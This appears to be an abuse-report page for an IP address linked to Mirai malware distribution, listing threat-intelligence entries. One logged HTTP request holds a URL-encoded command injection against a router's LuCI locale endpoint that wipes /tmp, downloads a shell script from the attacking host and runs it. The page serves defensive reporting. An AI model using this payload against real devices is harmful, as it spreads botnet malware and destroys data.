(antiscrape_rule) Web application abuse detected 104.168.5.4 (US/United States/104-168-5-4-host.colo ...
show more(antiscrape_rule) Web application abuse detected 104.168.5.4 (US/United States/104-168-5-4-host.colocrossing.com): 5 in the last 900 secs
show less
Added into the Abuse.ch URLHaus IOC database for distributing malware with tags: mirai.
Source: http ...
show moreAdded into the Abuse.ch URLHaus IOC database for distributing malware with tags: mirai.
Source: https://urlhaus.abuse.ch/url/2750799/
show less
Added into the Abuse.ch URLHaus IOC database for distributing malware with tags: mirai.
Source: http ...
show moreAdded into the Abuse.ch URLHaus IOC database for distributing malware with tags: mirai.
Source: https://urlhaus.abuse.ch/url/2750433/
show less
ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers
Hacking
Anonymous
Possibly hosting malware found in request from 185.224.128.191:
HTTP Req: GET /cgi-bin/luci/;stok=/ ...
show morePossibly hosting malware found in request from 185.224.128.191:
HTTP Req: GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20rm%20-rf%20%2A%3B%20wget%20http%3A%2F%2F104.168.5.4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh) HTTP/1.1
Time: Sat, 20 Jan 2024 18:27:59 +0100
Unauthorised web server access and/or looking for web app vulnerabilities.
Port 80
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
show less